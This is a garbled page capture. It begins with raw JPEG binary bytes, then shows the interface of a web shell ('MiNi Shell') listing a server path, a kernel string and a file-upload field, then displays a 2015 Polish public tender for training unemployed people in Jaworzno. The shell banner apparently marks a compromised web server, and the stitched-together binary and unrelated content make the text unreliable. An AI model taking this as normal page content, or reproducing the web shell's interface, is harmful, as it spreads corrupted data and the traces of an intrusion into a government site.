JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150902/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150902/227522-N-2015.html

<p class="kh_header"><b>Jaworzno: Przedmiotem zamówienia jest usługa szkoleniowa w zakresie zorganizowania i przeprowadzenia grupowych szkoleń osób bezrobotnych w ramach projektu Aktywizacja osób bezrobotnych w wieku 30+ zarejestrowanych  w Powiatowym Urzędzie Pracy w Jaworznie (I) w ramach Działania 7.2 Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020 współfinansowanego ze środków Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 227522 - 2015; data zamieszczenia: 02.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Jaworznie , ul. Północna 9B, 43-600 Jaworzno, woj. śląskie, tel. 032 6181924, faks 032 6181901.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-jaworzno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest usługa szkoleniowa w zakresie zorganizowania i przeprowadzenia grupowych szkoleń osób bezrobotnych w ramach projektu Aktywizacja osób bezrobotnych w wieku 30+ zarejestrowanych  w Powiatowym Urzędzie Pracy w Jaworznie (I) w ramach Działania 7.2 Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020 współfinansowanego ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa szkoleniowa w zakresie zorganizowania i przeprowadzenia grupowych szkoleń osób bezrobotnych w ramach projektu Aktywizacja osób bezrobotnych w wieku 30+ zarejestrowanych  w Powiatowym Urzędzie Pracy w Jaworznie (I) w ramach Działania 7.2 Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020 współfinansowanego ze środków Europejskiego Funduszu Społecznego  w następujących zakresach:
Zakres I:Magazynier z obsługą wózka jezdniowego i egzaminem UDT - 5 osób w I edycji,
zakres II: Kurs spawania blach i rur  spoinami pachwinowymi w metodzie MIG i MAG
                  - 5 osób w I edycji,
zakres III:Pracownik biurowy z elementami kadr i płac - 8 osób w I edycji,
zakres IV:Uprawnienia SEP do 1 kV - 5 osób w I edycji..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku wymagane jest by Wykonawca wykazał, że posiada aktualny wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę Wykonawcy - zgodnie z rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych /tekst jednolity: Dz. U. z 2014r, poz. 781/
Ocena spełnienia warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia, o którym mowa w rozdziale 6 ust.3 pkt 3.1 i pkt 3.2 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku wymagane jest by Wykonawca wykazał,
że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonał co najmniej dwie usługi odpowiadające swoim rodzajem przedmiotowi zamówienia:
1)  zakres I -  co najmniej dwie usługi szkoleniowe z zakresu Magazynier z obsługą wózka jezdniowego i egzaminem UDT na minimum 5 osób. Zamawiający uzna również warunek za spełniony w przypadku oddzielnej realizacji tych szkoleń, czyli oddzielnie po dwa szkolenia: Magazynier oraz Operator-kierowca wózka jezdniowego wraz z wymianą butli gazowych oraz egzaminem UDT. Zamawiający uzna również inną kombinację pod warunkiem, że suma szkoleń ujętych w wykazie głównych usług potwierdzi zrealizowanie co najmniej dwóch usług z zakresu Magazynier z obsługą wózka jezdniowego i egzaminem UDT. Zamawiający uzna również warunek za spełniony w przypadku realizacji szkoleń o innej nazwie, o zakresie odpowiadającym przedmiotowi zamówienia. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera.
2) zakres II -  co najmniej dwie usługi szkoleniowe z zakresu Kurs spawania blach i rur spoinami pachwinowymi w metodzie MIG i MAG na minimum 5  Zamawiający uzna również warunek za spełniony w przypadku oddzielnej realizacji tych szkoleń, czyli oddzielnie po dwa szkolenia: Kurs spawania blach i rur  spoinami  pachwinowymi w metodzie MIG oraz  Kurs spawania blach i rur spoinami  pachwinowymi w metodzie MAG. Zamawiający uzna również inną kombinację pod warunkiem, że suma szkoleń ujętych w wykazie głównych usług potwierdzi zrealizowanie co najmniej dwóch usług z zakresu spawanie blach i rur spoinami pachwinowymi w metodzie MIG i MAG. Zamawiający uzna również warunek za spełniony               w przypadku realizacji szkoleń o innej nazwie. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera. 
3) Zakres III - co najmniej dwie usługi szkoleniowe z zakresu Pracownik  biurowy z elementami kadr i płac na minimum 8 osób.  Zamawiający uzna również warunek za spełniony                           w przypadku oddzielnej realizacji tych szkoleń, czyli oddzielnie po dwa szkolenia: pracownik biurowy oraz szkolenia z zakresu kadr i płac. Zamawiający uzna również warunek za spełniony
w przypadku realizacji szkoleń o innej nazwie. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera.
4) Zakres IV co najmniej dwie usługi szkoleniowe z zakresu Uprawnienia SEP do 1 kV na minimum 5 osób Zamawiający uzna również warunek za spełniony
w przypadku realizacji szkoleń o innej nazwie. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera.
Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w rozdziale 6 ust.4 pkt 4.1-4.3 SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami zdolnymi do wykonania zamówienia, Wykonawca wyznaczy
do realizacji przedmiotu zamówienia kadrę wykładowczą, spełniającą następujące warunki:
1)  wykładowcy prowadzący zajęcia teoretyczne muszą posiadać wykształcenie wyższe związane z tematyką prowadzonej jednostki modułowej lub wykształcenie wyższe oraz minimum 3 letnie doświadczenie zawodowe w prowadzeniu zajęć dydaktycznych zgodnych z tematyką prowadzonej jednostki modułowej.
	W przypadku jednostki modułowej: obsługa wózków jezdniowych wraz z wyminą butli gazowych oraz obsługa kasy fiskalnej i terminali płatniczych Zamawiający dopuszcza możliwość prowadzenia szkolenia przez wykładowców posiadających wykształcenie minimum średnie oraz minimum 3 letnie doświadczenie zawodowe w prowadzeniu zajęć dydaktycznych zgodnych z tematyką prowadzonej jednostki modułowej.
2) wykładowcy prowadzący zajęcia praktyczne oraz ćwiczenia muszą posiadać co najmniej	wykształcenie średnie związane z tematyką prowadzonej jednostki modułowej lub	wykształcenie średnie oraz minimum 3 letnie doświadczenie zawodowe w prowadzeniu zajęć 	dydaktycznych zgodnych z tematyką prowadzonej jednostki modułowej.
3) każda z osób prowadzących zajęcia musi posiadać co najmniej 2 letnie doświadczenie 	zawodowe w prowadzeniu zajęć  dydaktycznych zgodnych z tematyką prowadzonej jednostki 	modułowej;
Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w rozdziale 6  ust.5  pkt 5.1-5.2 SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.85</li>
<li>2 - posiadanie certyfikatu jakości usług - 0.1</li>
<li>3 - prowadzenie analiz skuteczności i efektywności przeprowadzanych szkoleń - 0.05</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) osób prowadzących szkolenie. Po uzyskaniu pisemnej zgody Zamawiającego, w szczególnie 	uzasadnionych przypadkach (np. choroba, zgon lub inna sytuacja losowa, której nie można było 	wcześniej przewidzieć) Wykonawca może dokonać wymiany osób delegowanych do wykonania 	przedmiotu umowy. W takiej sytuacji Wykonawca przedstawi Zamawiającemu 
     pisemnie propozycję  zmiany  wraz  z  jej  uzasadnieniem,    wskazując  osobę/y o  co  najmniej
	porównywalnych kwalifikacjach jakie określono w SIWZ. Jednocześnie Wykonawcy nie	przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio lub pośrednio z wymiany	osób, wyznaczonych przez Wykonawcę do wykonania przedmiotu zamówienia.
2) terminu realizacji przedmiotu zamówienia. Po uzyskaniu pisemnej zgody Zamawiającego
	w szczególnie uzasadnionych przypadkach (np. choroba, zgon lub inna sytuacja losowa, której	nie można było wcześniej przewidzieć) Zamawiający może wyrazić zgodę na zmianę terminu	realizacji szkolenia. W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie	propozycję zmiany wraz z jej uzasadnieniem. Zmiana terminu szkolenia  - w szczególnie	uzasadnionych przypadkach, np. niezakwalifikowanie się odpowiedniej liczby	uczestników szkolenia - może także nastąpić z inicjatywy Zamawiającego.	Jednocześnie Wykonawcy nie  przysługuje roszczenie o zwrot kosztów wynikających	bezpośrednio lub pośrednio ze zmiany terminu realizacji przedmiotu zamówienia.
3) miejsca przeprowadzenia szkolenia. Po uzyskaniu pisemnej zgody Zamawiającego,                           	w szczególnie uzasadnionych przypadkach, Wykonawca może dokonać zmiany miejsca	przeprowadzenia szkolenia. W takiej sytuacji Wykonawca przedstawi Zamawiającemu	pisemnie propozycję zmiany wraz z jej uzasadnieniem, wskazując propozycję miejsca 	szkolenia o co najmniej porównywalnych warunkach jakie określono w SIWZ, przy	jednoczesnym spełnieniu warunku, o którym mowa w Rozdziale 3, pkt. 3, ppkt. 3.1 SIWZ. 	Jednocześnie Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających 	bezpośrednio lub pośrednio ze zmiany miejsca szkolenia.
4) zmniejszenia ilości osób przewidzianych do przeszkolenia - w szczególnie uzasadnionych 	przypadkach tj. rezygnacja osoby zakwalifikowanej na szkolenie w terminie uniemożliwiającym 	dokonanie  kolejnego  naboru, brak  osób  spełniających  warunki  skierowania  na szkolenie, 	Zamawiający może zmniejszyć ilość skierowanych na szkolenie maksymalnie o 1 osobę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-jaworzno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Jaworznie ul. Północna 9b, 43-600 Jaworzno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2015 godzina 08:00, miejsce: Powiatowy Urząd Pracy w Jaworznie ul. Północna 9b, 43-600 Jaworzno
I piętro, pokój nr 124.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w ramach projektu Aktywizacja osób bezrobotnych w wieku 30+ zarejestrowanych 
w Powiatowym Urzędzie Pracy  w Jaworznie (I) w ramach Działania 7.2 Regionalnego Programu Operacyjnego Województwa Śląskiego na lata   2014-2020 współfinansowanego ze środków 
Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakres I: Magazynier z obsługą wózka jezdniowego i egzaminem UDT - 5 osób w I edycji,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 6 tygodni. 
Program szkolenia: minimalna ilość godzin - 190, w tym minimum  90 godzin ćwiczeń.
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: magazynier, z zakresu: praca w handlu                       hurtowym (kod zawodu: 413103) z następującymi jednostkami modułowymi: 
1) przepisy bhp i p.poż w magazynie - hurtowni- minimum 7 godzin, zawierająca następujące jednostki                	szkoleniowe:
- bezpieczeństwo i higiena pracy w jednostce handlowej;
- bhp przy transporcie ręcznym i mechanicznym; 
- bhp przy urządzeniach elektrycznych; 
- ochrona przeciwpożarowa; 
- udzielanie pierwszej pomocy na miejscu wypadku; 
- udzielanie pierwszej pomocy przy oparzeniach, odmrożeniach, zatruciach. 
2) odbiór towarów- minimum 18 godzin, zawierająca następujące jednostki szkoleniowe:
- odpowiedzialność materialna pracownika magazynowego;
- dokumentacja organizacji magazynu; 
- sposoby rozmieszczenia towarów w magazynie;
- proces magazynowy w magazynach kompletacyjnych;
- systemy kompletacji;
- znakowanie ładunków kodami kreskowymi;
- odbiór ilościowy i jakościowy;
- gospodarka opakowaniami w magazynach.
3) zasady poprawnego przechowywania towarów- minimum 13 godzin, zawierająca następujące                		 jednostki szkoleniowe:
- zasady właściwego przechowywania towarów;
-  instalacje w budynkach magazynowych; 
- urządzenia do składowania;
- magazynowe środki transportu;
- pomocnicze urządzenia magazynowe; 
- czynniki wpływające na przechowywanie towarów;
- zmiany zachodzące w przechowywanych towarach;
- szkodniki magazynowe;
- ubytki towarowe.
4) obsługa programu SUBIEKT  dla WINDOWS do prowadzenia gospodarki magazynowej - minimum 	30 godzin, zawierająca następujące jednostki szkoleniowe:
- konfiguracja programu;
- sporządzanie dokumentów zakupu, zamówień do dostawcy i rozliczanie zobowiązań finansowych;
- sporządzanie dokumentów sprzedaży, zamówień od klienta i rozliczanie należności finansowych; 
- sporządzanie dokumentów korygujących zakupu i sprzedaży; 
-sporządzanie dokumentów przyjęcia magazynowe, wydania magazynowe, przesunięcia                                       	między magazynowe;
- przeprowadzanie inwentaryzacji; 
- budowa i obsługa drukarki fiskalnej; 
- drukowanie raportów.
2. jednostkę modułową: obsługa kasy fiskalnej  i terminali płatniczych - minimum 10 godzin,
3. jednostkę modułową: podstawowe zasady higieny - minimum 10 godzin,
4. jednostkę modułową: obsługa wózków jezdniowych wraz z wymianą butli gazowych- minimum                 	67 godzin,
5. jednostkę modułową: nowoczesne techniki sprzedaży- minimum 10 godzin,
6.jednostkę modułową: obsługa programu SYMFONIA w zakresie gospodarki magazynowej 
- minimum 25 godzin.
Dodatkowe wymagania: Część szkolenia dotycząca obsługi wózka jezdniowego ma przygotować uczestników do samodzielnego prowadzenia i obsługi wózka w transporcie wewnątrzzakładowym oraz powinna być przeprowadzona w oparciu o program opracowany lub zatwierdzony przez jednostkę      organizacyjną wyznaczoną przez Ministra właściwego do spraw gospodarki zgodnie                                   z  Rozporządzeniem Ministra Gospodarki z dnia 10 maja 2002r. w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym (Dz. U. Nr 70, poz. 650 z późn. zm) lub równoważny.
